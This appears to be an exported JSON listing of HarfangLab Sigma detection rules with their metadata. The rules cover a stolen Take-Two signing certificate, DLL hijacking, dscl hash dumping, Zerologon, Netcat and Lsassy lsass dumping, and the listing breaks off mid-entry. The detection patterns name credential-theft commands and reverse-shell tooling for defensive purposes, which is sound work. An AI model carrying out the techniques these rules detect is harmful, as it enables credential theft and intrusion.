"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079963Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/cra0_net/status/1739995773746696386",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1588_003_suspicious_taketwo_signed_binary.yml",
"content": "title: Suspicious Binary Signed with Take-Two Stolen Certificate\nid: 97be2bc7-8ea3-4c14-ad1e-5cee3597702b\ndescription: |\n Detects the execution of suspicious binaries signed with the Take-Two's stolen certificate.\n In 2023, Take-Two suffered a data-breach and a few gigabytes of data were stolen including an old code-signing certificate.\n Adversaries may use the stolen certificate to sign malicious code and evade AV/EDR detection.\n It is recommended to investigate the binary to determine its legitimacy, for instance by determining whether this file may be part of a legitimate Take-Two Interactive component.\nreferences:\n - https://x.com/cra0_net/status/1739995773746696386\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2023/12/28\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_displayname:\n ProcessSignature: 'Take-Two Interactive Software, Inc.'\n\n selection_serial:\n ProcessSignatureSignerSerialNumber: '695043D68F15550FD5DB370FA8817B04'\n\n filter_launcher:\n Description:\n - '2K Launcher Agent'\n - '2K Launcher'\n - '2K Launcher Updater'\n Image|endswith:\n - '\\LauncherPatcher.exe'\n - '\\crashagent64.exe'\n - '\\launcher_helper.exe'\n - '\\t2gp.exe'\n - '\\launcher.exe'\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "97be2bc7-8ea3-4c14-ad1e-5cee3597702b",
"rule_name": "Suspicious Binary Signed with Take-Two Stolen Certificate",
"rule_description": "Detects the execution of suspicious binaries signed with the Take-Two's stolen certificate.\nIn 2023, Take-Two suffered a data-breach and a few gigabytes of data were stolen including an old code-signing certificate.\nAdversaries may use the stolen certificate to sign malicious code and evade AV/EDR detection.\nIt is recommended to investigate the binary to determine its legitimacy, for instance by determining whether this file may be part of a legitimate Take-Two Interactive component.\n",
"rule_creation_date": "2023-12-28",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "97d348be-3508-4263-a359-6245f34e429c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619498Z",
"creation_date": "2026-03-23T11:45:34.619500Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619504Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ss64.com/mac/nohup.html",
"https://attack.mitre.org/techniques/T1564/011/"
],
"name": "t1564_011_nohup_execution.yml",
"content": "title: Suspicious nohup Execution\nid: 97d348be-3508-4263-a359-6245f34e429c\ndescription: |\n Detects the execution of a command using nohup in a suspicious execution context.\n On macOS, the nohup binary allows a usre to run a command with hangup signals (SIGHUP) ignored.\n Adversaries may invoke processes using nohup to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.\n It is recommended to analyze the execution context around the nohup process to look for malicious processes.\nreferences:\n - https://ss64.com/mac/nohup.html\n - https://attack.mitre.org/techniques/T1564/011/\ndate: 2024/07/23\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.011\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n ProcessName: 'nohup'\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "97d348be-3508-4263-a359-6245f34e429c",
"rule_name": "Suspicious nohup Execution",
"rule_description": "Detects the execution of a command using nohup in a suspicious execution context.\nOn macOS, the nohup binary allows a usre to run a command with hangup signals (SIGHUP) ignored.\nAdversaries may invoke processes using nohup to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.\nIt is recommended to analyze the execution context around the nohup process to look for malicious processes.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "97ec299c-263c-47ff-89c3-59ff26744ee4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098983Z",
"creation_date": "2026-03-23T11:45:34.098986Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098990Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/",
"https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/",
"https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_explorer.yml",
"content": "title: DLL Hijacking via EXPLORER.exe\nid: 97ec299c-263c-47ff-89c3-59ff26744ee4\ndescription: |\n Detects potential Windows DLL Hijacking via EXPLORER.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html/\n - https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/\n - https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/\n - https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EXPLORER.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\apphelp.dll'\n - '\\cscui.dll'\n - '\\explorerframe.dll'\n - '\\mswb7.dll'\n - '\\propsys.dll'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - '\\windows.storage.search.dll'\n - '\\windowscodecs.dll'\n - '\\windowsudk.shellcommon.dll'\n - '\\xmllite.dll'\n - '\\linkinfo.dll'\n - '\\mpr.dll'\n - '\\fxsst.dll'\n - '\\winmm.dll'\n - '\\ntshrui.dll'\n - '\\winhttp.dll'\n - '\\twinapi.dll'\n filter_legitimate_image:\n Image:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\SysWOW64\\explorer.exe'\n - '?:\\Windows\\System32\\explorer.exe'\n - '?:\\Windows\\WinSxS\\\\*'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation' # cscui.dll\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "97ec299c-263c-47ff-89c3-59ff26744ee4",
"rule_name": "DLL Hijacking via EXPLORER.exe",
"rule_description": "Detects potential Windows DLL Hijacking via EXPLORER.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "980b1b5c-ef5a-4e4f-b611-0ae94ef47b61",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598499Z",
"creation_date": "2026-03-23T11:45:34.598503Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598510Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://embracethered.com/blog/posts/2022/grabbing-and-cracking-macos-hashes/",
"https://attack.mitre.org/techniques/T1555/005/"
],
"name": "t1564_001_creds_dump_dscl.yml",
"content": "title: Credentials Dumped via dscl\nid: 980b1b5c-ef5a-4e4f-b611-0ae94ef47b61\ndescription: |\n Detects the usage of dscl to dump hashes from the local directory service, located at \"/var/db/dslocal/nodes/Default/users/*\".\n This may be used to dump the hash and salt of an user's account. If an attacker is able to crack these hashes, they may obtain valid credentials.\n It is recommended to check for other suspicious activities by the parent process.\nreferences:\n - https://embracethered.com/blog/posts/2022/grabbing-and-cracking-macos-hashes/\n - https://attack.mitre.org/techniques/T1555/005/\ndate: 2024/07/22\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.dscl\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessName:\n - 'defaults'\n - 'dscl'\n CommandLine|contains: 'ShadowHashData'\n\n exclusion_deletion:\n CommandLine|contains: ' -delete '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "980b1b5c-ef5a-4e4f-b611-0ae94ef47b61",
"rule_name": "Credentials Dumped via dscl",
"rule_description": "Detects the usage of dscl to dump hashes from the local directory service, located at \"/var/db/dslocal/nodes/Default/users/*\".\nThis may be used to dump the hash and salt of an user's account. If an attacker is able to crack these hashes, they may obtain valid credentials.\nIt is recommended to check for other suspicious activities by the parent process.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9818513b-bd56-4baf-83bd-4c6965a49eb0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295180Z",
"creation_date": "2026-03-23T11:45:35.295183Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295189Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1069_001_dscl_readall_groups_macos.yml",
"content": "title: Groups Properties Discovered via Dscl\nid: 9818513b-bd56-4baf-83bd-4c6965a49eb0\ndescription: |\n Detects the execution of the dscl command to list all groups and their properties.\n Attackers may use it during the discovery phase of an attack to retrieve groups and their properties (like permissions heritage and id) of any users.\n It is recommended to investigate the parent process and look for any other potentially malicious actions taken by it.\nreferences:\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/12/01\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # dscl . -readall groups\n # dscl . -readall /Groups\n # dscl . -readall /Groups some_property\n Image: '/usr/bin/dscl'\n ParentImage|contains: '?'\n CommandLine|contains|all:\n - 'readall '\n - 'groups'\n\n exclusion_munki:\n - Ancestors|contains: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n - ParentCommandLine|contains: '/usr/local/munkireport/scripts/'\n\n exclusion_mosyle:\n Ancestors|contains: '|/Library/Application Support/Mosyle/MosyleMDM.app/Contents/MacOS/MosyleMDM|'\n\n exclusion_package_script:\n GrandparentCommandLine: '/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9818513b-bd56-4baf-83bd-4c6965a49eb0",
"rule_name": "Groups Properties Discovered via Dscl",
"rule_description": "Detects the execution of the dscl command to list all groups and their properties.\nAttackers may use it during the discovery phase of an attack to retrieve groups and their properties (like permissions heritage and id) of any users.\nIt is recommended to investigate the parent process and look for any other potentially malicious actions taken by it.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "98216765-b1d4-45cd-9711-7c5edcd45264",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086189Z",
"creation_date": "2026-03-23T11:45:34.086191Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086195Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware",
"https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin",
"https://attack.mitre.org/techniques/T1068/",
"https://attack.mitre.org/techniques/T1210/",
"https://attack.mitre.org/techniques/T1212/"
],
"name": "t1068_zerologon_tool_usage.yml",
"content": "title: Possible Zerologon Exploitation\nid: 98216765-b1d4-45cd-9711-7c5edcd45264\ndescription: |\n Detects the usage of the Reset-ComputerMachinePassword PowerShell cmdlet launched by a new service.\n This can be the result of the exploitation of the CVE-2020-1472 vulnerability (aka Zerologon), an elevation of privilege vulnerability that enables attackers to obtain full domain administrator privileges.\n This cmdlet is used to restore the domain controller’s password after the exploitation of the vulnerability.\n Is recommended to contact system administrators to determine whether this action was legitimate as well as to look for other malicious actions stemming from the services.exe process on the host.\nreferences:\n - https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware\n - https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin\n - https://attack.mitre.org/techniques/T1068/\n - https://attack.mitre.org/techniques/T1210/\n - https://attack.mitre.org/techniques/T1212/\ndate: 2021/11/05\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.lateral_movement\n - attack.t1210\n - attack.credential_access\n - attack.t1212\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2020-1472\n - classification.Windows.Exploit.ZeroLogon\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage: '?:\\Windows\\System32\\services.exe'\n CommandLine|contains: 'Reset-ComputerMachinePassword'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "98216765-b1d4-45cd-9711-7c5edcd45264",
"rule_name": "Possible Zerologon Exploitation",
"rule_description": "Detects the usage of the Reset-ComputerMachinePassword PowerShell cmdlet launched by a new service.\nThis can be the result of the exploitation of the CVE-2020-1472 vulnerability (aka Zerologon), an elevation of privilege vulnerability that enables attackers to obtain full domain administrator privileges.\nThis cmdlet is used to restore the domain controller’s password after the exploitation of the vulnerability.\nIs recommended to contact system administrators to determine whether this action was legitimate as well as to look for other malicious actions stemming from the services.exe process on the host.\n",
"rule_creation_date": "2021-11-05",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1210",
"attack.t1212"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "98269cb0-6fe3-4fda-85c3-84a45160ad01",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590128Z",
"creation_date": "2026-03-23T11:45:34.590132Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590140Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/techniques/T1095/"
],
"name": "t1049_netcat_windows.yml",
"content": "title: Netcat Execution (Windows)\nid: 98269cb0-6fe3-4fda-85c3-84a45160ad01\ndescription: |\n Detects the execution of Netcat (netcat.exe, nc.exe) which is a networking utility used for reading and writing data across network connections.\n Netcat is often abused by attackers for malicious activities such as establishing reverse shells, data transfer, and lateral movement within a network.\n It is recommended to investigate the process executing Netcat, to analyze the command-line arguments for suspicious patterns, to review the network traffic originating from the system, and to check for any unauthorized access or credentials exposure.\n Additionally, ensure that Netcat is being used for legitimate purposes.\nreferences:\n - https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1095/\ndate: 2022/08/17\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.command_and_control\n - attack.t1095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Netcat\n - classification.Windows.Behavior.RemoteShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Imphash:\n - '98ce7b6533cbd67993e36dafb4e95946' # nc.exe - b3b207dfab2f429cc352ba125be32a0cae69fe4bf8563ab7d0128bba8c57a71c\n - '7a32d32e9e610798ffcc78ea47c7ccd1' # 17fdce691a410a4aad31b1b64a21c7f623fcf5ff31cd79b32171d3e5702b8b2d\n - 'cdc279a12c6a556c25ba7b0510c2b96e' # nc64.exe - ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419\n - '3d6493323c69a48467d0f9eeec5c2634' # 848a5ca5db9146592ba263d651d957d84c1389059d6a44a456c56e0b6ae2ee74\n - Description|contains: 'NetCat' # https://github.com/diegocr/netcat and https://github.com/vinsworldcom/NetCat64\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "98269cb0-6fe3-4fda-85c3-84a45160ad01",
"rule_name": "Netcat Execution (Windows)",
"rule_description": "Detects the execution of Netcat (netcat.exe, nc.exe) which is a networking utility used for reading and writing data across network connections.\nNetcat is often abused by attackers for malicious activities such as establishing reverse shells, data transfer, and lateral movement within a network.\nIt is recommended to investigate the process executing Netcat, to analyze the command-line arguments for suspicious patterns, to review the network traffic originating from the system, and to check for any unauthorized access or credentials exposure.\nAdditionally, ensure that Netcat is being used for legitimate purposes.\n",
"rule_creation_date": "2022-08-17",
"rule_modified_date": "2025-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049",
"attack.t1095"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "98991f0a-b80a-4401-809d-cd262444c4f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606379Z",
"creation_date": "2026-03-23T11:45:34.606382Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606390Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Hackndo/lsassy/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_lsassy.yml",
"content": "title: Windows Credentials Dumped via Lsassy\nid: 98991f0a-b80a-4401-809d-cd262444c4f1\ndescription: |\n Detects Windows credentials being dumped using the Lsassy tool.\n Lsassy is a tool intended to ease Windows credentials dumping by implementing multiple methods using different tools.\n It is recommended to identify the source of the remote connection using authentication logs and:\n - Investigate if the IP is involved in further actions on the same host or on different hosts;\n - Check if the user involved in the alert has made other suspicious activity;\n - Launch investigation on the source machine.\nreferences:\n - https://github.com/Hackndo/lsassy/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2024/01/25\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Lsassy\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\cmd.exe'\n ProcessImage|endswith: '\\cmd.exe'\n CommandLine|contains:\n - \"for /f *tokens=2 delims= *%J in ('*tasklist /fi *Imagename eq lsass.ex* | *find *lsass*') do\"\n - \"for /f *tokens=1,2 delims= *%A in ('*tasklist /fi *Imagename eq lsass.ex* | *find *lsass*') do\"\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "98991f0a-b80a-4401-809d-cd262444c4f1",
"rule_name": "Windows Credentials Dumped via Lsassy",
"rule_description": "Detects Windows credentials being dumped using the Lsassy tool.\nLsassy is a tool intended to ease Windows credentials dumping by implementing multiple methods using different tools.\nIt is recommended to identify the source of the remote connection using authentication logs and:\n - Investigate if the IP is involved in further actions on the same host or on different hosts;\n - Check if the user involved in the alert has made other suspicious activity;\n - Launch investigation on the source machine.\n",
"rule_creation_date": "2024-01-25",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "98a31d66-350a-4f80-b72f-5d09cae9b0b1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601814Z",
"creation_date": "2026-03-23T11:45:34.601817Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601825Z",
"rule_level": "high",
"rule_confidence": "strong",
